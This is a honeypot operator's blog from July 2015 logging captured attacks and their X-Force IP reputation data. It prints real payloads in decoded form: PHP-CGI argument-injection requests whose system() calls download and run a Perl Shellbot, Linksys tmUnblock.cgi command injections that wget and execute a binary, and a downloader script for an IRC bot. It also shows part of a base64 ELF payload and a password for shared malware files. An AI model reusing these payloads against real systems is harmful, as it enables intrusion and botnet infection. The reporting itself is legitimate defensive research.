Freitag, 31. Juli 2015

MongoDB - scanning ip 89.248.167.159

I have set up a MongoDB dummy some time ago. Although I am not quite sure how to handle the data I am receiving, what is the main reason I have not yet reported any of this stuff. Today, while reviewing the logs I saw that one IP is accessing my dummy on both of my Honeypots. What is at least a bit strange. In addition to that, the IP only accessed this dummy.

BEGIN OF MONGODB DATA:
2015-07-31 18:09:04
Source IP: 89.248.167.159
Country: NL RiskScore: 8.6 Malware: []
:▒▒zr▒admin.$cmd▒▒▒▒ismaster
 END OF DATA
According to IBM X-Force data this IP address is known to perform scanning activity
"geo": {
      "country": "Netherlands",
      "countrycode": "NL"
   },
   "ip": "89.248.167.159",
   "reason": "Firewall deny log analysis",
   "reasonDescription": "This IP was involved in port scanning activities.",
   "score": 8.6,
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2012-03-22T07:26:00.000Z",
         "geo": {
            "country": "Netherlands",
            "countrycode": "NL"
         },
 
 

HTTP Buffer overflow attack - 204.15.135.116

BEGIN OF HTTP DATA:
2015-07-31 12:43:19
Source IP: 204.15.135.116
Country: US RiskScore: 1 Malware: []
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%6
9%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%7
2%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%6
4%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%7
4%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 43604
Connection: close
The encoded url translates to:
print urllib.unquote(url).decode('utf-8')
/cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input+-n HTTP/1.1
 
The request was followed by php code
<?php
$bufferf = 'f0VMRgIBAQMAAAAAAAAA [...snip...]
My buffer read 16k of data and ended the connection.
IP intelligence by IBM X-Force shows:
{
   "categoryDescriptions": {},
   "cats": {},
   "geo": {
      "country": "United States",
      "countrycode": "US"
   },
   "ip": "204.15.135.116",
   "reason": "Firewall deny log analysis",
   "reasonDescription": "This IP was involved in port scanning activities.",
   "score": 1,
}
The IP performed 4 of these requests in a row.

Sonntag, 26. Juli 2015

Two stage nttpd attack - 119.42.100.97

BEGIN OF HTTP DATA:
2015-07-27 00:58:11
Source IP: 119.42.100.97
Country: TH RiskScore: 2.9 Malware: []
GET /tmUnblock.cgi HTTP/1.1


 END OF DATA

BEGIN OF HTTP DATA:
2015-07-27 00:58:51
Source IP: 119.42.100.97
Country: TH RiskScore: 2.9 Malware: []
POST /tmUnblock.cgi HTTP/1.1
content-length: 943

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f%31%31%39%2e%34%32%2e%31%30%30%2e%39%37%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b%2e%2f%2e%6e%74%74%70%64%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
 END OF DATA

What translates to
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;echo "rm -f .nttpd" >> .nttpd.sh;echo "wget -O .nttpd http://119.42.100.97:3344" >> .nttpd.sh;echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1
 As you can see, the first test "GET /tmUnblock.cgi" was successful, so the attacker tried to inject the code to get this nttpd on to the system.

I was still not able to get my hands on this code. If someone has it, please let me know.

IBM-Xforce shows
{
   "categoryDescriptions": {
      "Dynamic IPs": "This category contains IP addresses of dialup hosts and DSL lines.",
      "Spam": "This category lists IP addresses that were seen sending out spam."
   },
   "cats": {
      "Dynamic IPs": 86,
      "Spam": 29
   },
   "geo": {
      "country": "Thailand",
      "countrycode": "TH"
   },
   "ip": "119.42.100.97",
   "reason": "Spam sending activity",
   "reasonDescription": "This IP was involved in spam sending activities.",
   "score": 2.9,
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2014-01-23T17:33:00.000Z",
         "geo": {
            "country": "Thailand",
            "countrycode": "TH"
         },

Samstag, 25. Juli 2015

Announcement: dnsbl.sendmespam-ids.info

I found it very interesting that the majority of the IP addresses hitting my honeypot have a good reputation, although they trying sql injections, code execution, telnet attacks or email spamming.

So I played around with

 and set up my own blacklist. Currently it has 400 unique IP addresses seen in all sorts of attacks. I am not done with it, but it is available now. So if you have any questions or improvment ideas, well, just let me know.

 dnsbl.sendmespam-ids.info

and of course let me know if there is any issue.

Compromise attempt (Perl Shellbot) - 128.41.128.44

BEGIN OF HTTP DATA:
2015-07-24 13:15:21
Source IP: 128.41.128.44
Country: GB RiskScore: 7.1 Malware: []
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%
64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F
%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 204

<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("wget 194.60.242.251/minispeedtest/speedtest/.z/hb/plk03 -O /tmp/.0e1bc.log;perl /tmp/.0e1bc.log 188.165.44.137;rm -rf /tmp/.0e1bc.log;"); ?>
 END OF DATA

the decoded url looks like
 /phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n
the actual downloadable is a perl based Shellbot


  • 188.165.44.137 the url to connect to within the command
    {
       "categoryDescriptions": {},
       "cats": {},
       "geo": {
          "country": "France",
          "countrycode": "FR"
       },
       "ip": "188.165.44.137",
       "reason": "Regional Internet Registry",
       "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
       "score": 1,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "France",
                "countrycode": "FR"
             },
             "ip": "188.165.0.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "188.165.0.0/16"
          }
       ]
    }

  • 194.60.242.251 the download url
    {
       "categoryDescriptions": {
          "Scanning IPs": "These IPs have been identified as illegally scanning networks for vulnerabilities."
       },
       "cats": {
          "Scanning IPs": 14
       },
       "geo": {
          "country": "Ukraine",
          "countrycode": "UA"
       },
       "ip": "194.60.242.251",
       "reason": "Firewall deny log analysis",
       "reasonDescription": "This IP was involved in port scanning activities.",
       "score": 1.4,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "Ukraine",
                "countrycode": "UA"
             },
             "ip": "194.60.242.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "194.60.242.0/24"
          }
       ]
    }
  • 194.24.228.203 the hardcoded bot ip
    {
       "categoryDescriptions": {},
       "cats": {},
       "geo": {
          "country": "France",
          "countrycode": "FR"
       },
       "ip": "194.24.228.203",
       "reason": "Regional Internet Registry",
       "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
       "score": 1,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "France",
                "countrycode": "FR"
             },
             "ip": "194.24.228.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "194.24.228.0/23"
          }
       ]
    }

Freitag, 24. Juli 2015

Telnet hit with code execution attempt - 118.45.65.144

BEGIN OF TELNET DATA:
2015-07-24 05:33:40
Source IP: 118.45.65.144
Country: KR RiskScore: 1 Malware: []
rm /var/run/.zollard/*^Mrm -rf /var/run/.zollard^M/\-/yjTk\0AHf;/\-/0AHf\Yd9Z;cat /proc/mounts;/\-/Yd9Z\pgWD^M
User: admin
Pass: admin

 END OF DATA
According to some research

https://www.symantec.com/security_response/writeup.jsp?docid=2013-112710-1612-99&tabid=2

 the file is related to a WORM.

Looking for open SMTP - 193.0.200.136

193.0.200.136
Country: RU RiskScore: 2.9 Malware: [{u'count': 35, u'origin': u'CnC', u'last': u'2014-09-25T07:08:00Z', u'family': [u'darkcomet'], u'ip': u'0x00000000000000000000ffffc100c888', u'uri': u'', u'lastseen': u'2014-09-25T07:08:00Z', u'first': u'2014-09-25T07:08:00Z', u'type': u'CnC', u'firstseen': u'2014-09-25T07:08:00Z', u'md5': u'07A120BC14F6C76372C08547600FC4C0'}]
noauth@jsany.me
zurdocore19@gmail.com
147
MIME-Version: 1.0
From: noauth@jsany.me
To: zurdocore19@gmail.com
Date: 25 Jul 2015 01:32:14 +0200
Subject: 109.234.106.8,noauth@jsany.me,noauth

Telnet hit by well known ip - 98.121.74.52

BEGIN OF TELNET DATA:
2015-07-24 12:25:04
Source IP: 98.121.74.52
Country: US RiskScore: 10 Malware: [{u'count': 1, u'origin': u'SPM', u'domain': u'petuntzesn.debestellung.biz', u'last': u'2015-06-09T14:30:00Z', u'family':
[u'Spam Zero-Day'], u'filepath': u'Rechnung_655377.scr', u'ip': u'0x00000000000000000000ffff62794a34', u'uri': u'file://Rechnung_655377.scr', u'lastseen': u'
2015-06-09T14:30:00Z', u'first': u'2015-06-09T14:30:00Z', u'type': u'SPM', u'firstseen': u'2015-06-09T14:30:00Z', u'md5': u'5081146A6A8549DF8D914DF2B0AF92B5'
}, {u'count': 1, u'origin': u'SPM', u'domain': u'petuntzesn.debestellung.biz', u'last': u'2015-06-09T13:30:00Z', u'family': [u'Spam Zero-Day'], u'filepath':
u'Rechnung_3691423.scr', u'ip': u'0x00000000000000000000ffff62794a34', u'uri': u'file://Rechnung_3691423.scr', u'lastseen': u'2015-06-09T13:30:00Z', u'first'
: u'2015-06-09T13:30:00Z', u'type': u'SPM', u'firstseen': u'2015-06-09T13:30:00Z', u'md5': u'5081146A6A8549DF8D914DF2B0AF92B5'}]
User:
Pass:

 END OF DATA
The output shows the output of IBM X-Force and gives you details about the malware found on the IP address. IBM X-Force is integrated within my Honeypot solution per default

HTTP/2 malicious SERVER PUSH (weak POC)

HTTP/2 now supports SERVER PUSH messages

HTTP/2 adds a new interaction mode whereby a server can push responses to a client (Section 8.2). Server push allows a server to speculatively send data to a client that the server anticipates the client will need, trading off some network usage against a potential latency gain. The server does this by synthesizing a request, which it sends as a PUSH_PROMISE frame. The server is then able to send a response to the synthetic request on a separate stream.             https://http2.github.io/http2-spec/
So, in my mind that gives an fraudulent server a great opportunity to do bad stuff to the client. While thinking about it and jumping back out of bed to search for a scenario,  I created the data for this (weak) POC.
I call it a weak POC, cause I guess there is much more, I just wanted to show that it works in some way, what an attacker could do is for others to prove :-)

I used nghttp2 for both, server and client.

The server is started with
 ./nghttpd -v  --echo-upload -p/test=/eicar.com.txt.gz --early-response 8081 local.key local.crt
The -p option tell the server to push the EICAR test signature in case /test is requested.

The client than I call with
  ./nghttp -v https://<local ip>:8081/test

On server side we can see



That the server has send the EICAR test signature like I wanted to

This shows up in the client output as well


and gets displayed later on

 

Donnerstag, 23. Juli 2015

HTTP Buffer overflow attempt - 204.15.135.116

BEGIN OF HTTP DATA:
2015-07-23 18:20:31
Source IP: 204.15.135.116
Country: US RiskScore: 1 Malware: []
POST /cgi-bin/php-cgi.bin?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68
%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65
%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F
%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F
%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 43604
Connection: close
The decoded string is
 /cgi-bin/php-cgi.bin?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input+-n

More intresting is the buffer overflow which was tried to do

 <?php
$bufferf = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAAAAEDwQAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAACAEAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAA5EMAAAAAAADkQwAAA
AAAAAAAEAAAAAAAAQAAAAYAAADgmwAAAAAAAOCbUAAAAAAA4JtQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAB1k/mqVVBYIeAHDRYAAAAAYJ4AAGCeAAAAAgAAsAAAAAIAAAD7+yH/f0VMRgIBAQACAD4ADdAbQA+7ZL8XBQCglyITOADdsu67CAUbABoABg8FJwdA5IQ8IcABAAgA2GCT7gNwBHhABwIyIU8cAAAB+cAG9m+NB2SJADyTbQkAEDcGkJ6dkO8HUDAFN+ALNxnkQgIoBySDTUhQoN+gpJsMMgQcB0AHmZA
nIAAABFDlE/K933RkC+SADQdAlGcOS8gBADdRp4BhI7AApwAAAAAAAEAC/2SHAADuOAAAAkkHANt/u/0vbGliNjQFZC0IbnV4LXg4Ni0PLvem2/5zby4yAAQAABADAUdOVQAASHfJ5QIABgBDC1BN0w02Swc8
H0lATTdI0zQyO0RKA6S7sE0HOQAAEws0gDTdF2cpaxY2NE03yCgNGzU+RQ02SNNMIE+zC03TdIMPSB8FKzElgw3SNCojIQc4gw3YIC2TPQdH0zTdIA4DOkFGbNM0TRsUTggzAACSAeyCAy8PZpDBBhgjEBWQb
kCaBAoSCx9kCBtsHgcmTxEhGaQbLiMJIoakG7IsDwYTMCdBugHpDyQvCzemaZqGHCc/FxlCAZBBmh0MGmSQy96KAdcXOG5eyEGGo0kCSAEMciHPR3YABZ6H5OyQbAEXvIUADDIkJyYoTyBDMoTI95CDDcn2Xo
/HALtAnrzIAAgCcdeNZJAhjs6DMCSDRx+vBwuQDDIk1XTsAjnYkY9qAA5fHZLBhpkXaO1EO6SQnEd7myB3IWSwIZsXgkhOXsgVAr4KB+SQnHBiAcc7IQIdsiHkGFan3wuEMIScL7QGN32NQzZbj+kHihstQjb
IkC+czxeTQ/K9j7+7PAFIBhmSlVSzySEZbNwX/6oBSE4OyfhmANCMIRlki/JkP2SQIRncEkEtG7IhYy8rH2BDNoFHpC+kF8iGDck09DdfCENycrkBZdRXXNghbBdqAi+iDDYkg9kQj8FGMsiQ8vcGGZLBXy43
6yEZbEgzL2JgDMnJOQE0rc9CTg7JUckAVMnJIRtIFzwD4TYkgw1Ld8iQCCQXCBwCh+iQITk7qQGnSSUNyQVyugA8cQwyJIPvmBFCsJE1hHFPHySDDdkXCket7JAMNu4Xex8Bg05oE+fA1UCVTQgGkHjOHgAgB
0KQnHXId0EBH9TYEDLIClkVX+3//0MAX0p2X1JlZ2lzdGVyQ2xhc3NlcxN3tL39X2dtb25fEmFydAsAOnB0aP23ePRyZWFkLwl3YWl0cGlkALDbVroRY3a4KG4HdAAhbXOXfV9leGkMYwVXAFNvxdq3bi1hY2
NlFzxVb3Jrt67dbhVpZxN0aT9vaDdycrqRzf5ub19sb2NhEhCEY9Z+a/R+JJZyY3B5ABQ83ejb3WwMZG91UHZzcHLXdGa5d262D24IQCd0b2xfDTc3drtKbmEqZ2W1ZgfibWVtt+a+bURwZYsTZW8xbdvWbq4
jbUFsZacFeZ5udmtta6YgbyJ8d2NrNWvb/7rHbOpmZmx1c2gGYy4RzwoXWtc0cm0GPGtp2JpbagaTae4DMF/NtdddAmRyNXQ [... SNIPPET. ..]
 
 My honeypot fetched 8k of data, which is the maximum length of the used buffer.

Dienstag, 21. Juli 2015

Telnet Honeypot works

More like a Proof of Service
2015-07-22 06:46:58
Source IP: 218.161.14.170
Country: TW RiskScore: 1 Malware: []
echo -e '\x67\x61\x79\x66\x67\x74'
User: root
Pass: root

 END OF DATA
I implemented a TELNET honeypot service yesterday evening.
The access attempts during the night show that it works. The one posted above is one of the nicer ones, at the attacker at least tried to run a command also.

The TELNET server will welcomes you and asks you for username and password. He will let you access anyway and give you the chance to fire one command, actually, it let you type one command.

Montag, 20. Juli 2015

A two stage compromise attack

I am pretty sure you have read the blog post for the php code execution attack.

If you want to read the full data of my analyse I would like to point you to the pdf on this attack
https://drive.google.com/file/d/0B9asJlVwm-MObnluUUJoVzdQYkk/view?usp=sharing

But now to the other side of the story. By using my other/old honeypot I had not the feature of succesful attacks. Means, they always respond in two ways
  • Random Data (like artillery)
  • unsuccessful "40x" (like Beeswarm and Apache)
So, my software was designed to respond with "200 OK" for each data received. The basic idea was, well, I need to respond with something and "200 OK" made the most sense. So, as by this design I may have found a real benefit I was not aware of.

Two stage compromise attacks

 The attack described within the other post had two stages.
  1. PHP related encoded url
  2. PHP system() call to download and execute the malicous code
I am currently sure that the stage two would not had happen if I had not responded with "200 OK" to the first attack. So attack design is a very is IF...THAN attack.

Stage 1, is only used to find a target which is vulnerable. So I do not spread my code into the wild, or the hand of a researcher without being sure it would work.
 A good indicator for this theory is, that although the malware was written in 2008 and repacked in 2014, many Anti-Virus solutions does not detect it and even Virustotal does not report the download side as malicous.



Sonntag, 19. Juli 2015

Encoded bot execution from 162.209.14.224 including attack IPs

2015-07-19 16:28:52
Source IP: 162.209.14.224
Country: US RiskScore: 1 Malware: []
POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d
%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5
f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

<? system("cd /tmp ; wget trying.us.to/seed.jpg ; curl -O http://trying.us.to/seed.jpg ; fetch http://trying.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>
 END OF DATA
 This is a really really nice one.
The seed.jpg is basically just a script to download the original payload
#!/bin/bash
cd /var/tmp/ ;wget trying.us.to/index.htm; curl -O http://trying.us.to/index.htm; fetch http://trying.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget trying.us.to/stats.php;fetch http://trying.us.to/stats.php ;curl -O http://trying.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun
This scripts leads to the download of two files. index.htm and stats.php. Both are zipped tar archives.
  • index.htm is a IRC bot, the name of the unzipped file is libssl3.so.2
  • The second file, is the nicer one
    It includes a full folder structure which can be found in .d 

    The file bang.txt includes a list of more than 15.000 IP addresses
I uploaded all files to my google drive:
the Password is "danger"


Encoded NTTPD atack from 110.170.205.51

2015-07-19 05:17:46
Source IP: 110.170.205.51
Country: TH RiskScore: 2.9 Malware: []
POST /tmUnblock.cgi HTTP/1.1
content-length: 946

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f%31%31%30%2e%31%37%30%2e%32%30%35%2e%35%31%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b%2e%2f%2e%6e%74%74%70%64%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
 END OF DATA
The url decodes to
 submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;echo "rm -f .nttpd" >> .nttpd.sh;echo "wget -O .nttpd http://110.170.205.51:3344" >> .nttpd.sh;echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1

So basically the same as we had yesterday. Again the software is not downloadable.
But we have a RiskScore (2.9) reported by IBM X-Force Exchange

{
   "categoryDescriptions": {
      "Spam": "This category lists IP addresses that were seen sending out spam.                                                                             "
   },
   "cats": {
      "Spam": 29
   },
   "geo": {
      "country": "Thailand",
      "countrycode": "TH"
   },
   "ip": "110.170.205.51",
   "reason": "Spam sending activity",
   "reasonDescription": "This IP was involved in spam sending activities.",
   "score": 2.9,
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2012-03-22T07:26:00.000Z",
         "geo": {
            "country": "Thailand",
            "countrycode": "TH"
         },
 

Freitag, 17. Juli 2015

Encoded NTTPD atack from 149.129.69.111

Earlier today my honeypot (new version by the way), received an encoded attack

2015-07-17 19:04:14
Source IP: 149.129.69.111
Country: MY RiskScore: 1 Malware: []
POST /tmUnblock.cgi HTTP/1.1
content-length: 946

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f%31%34%39%2e%31%32%39%2e%36%39%2e%31%31%31%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b%2e%2f%2e%6e%74%74%70%64%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
The encoded string decodes to
 submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;echo "rm -f .nttpd" >> .nttpd.sh;echo "wget -O .nttpd http://149.129.69.111:3344" >> .nttpd.sh;echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1

 The software cant be downloaded currently, as the IP address is not responding. Best guess is that the attack tried to install a open directory web server. 

Montag, 13. Juli 2015

Multiple ChinaZ related attacks - 211.147.2.192

Yesterday, my honeypot was hit by several ChinaZ related attacks.

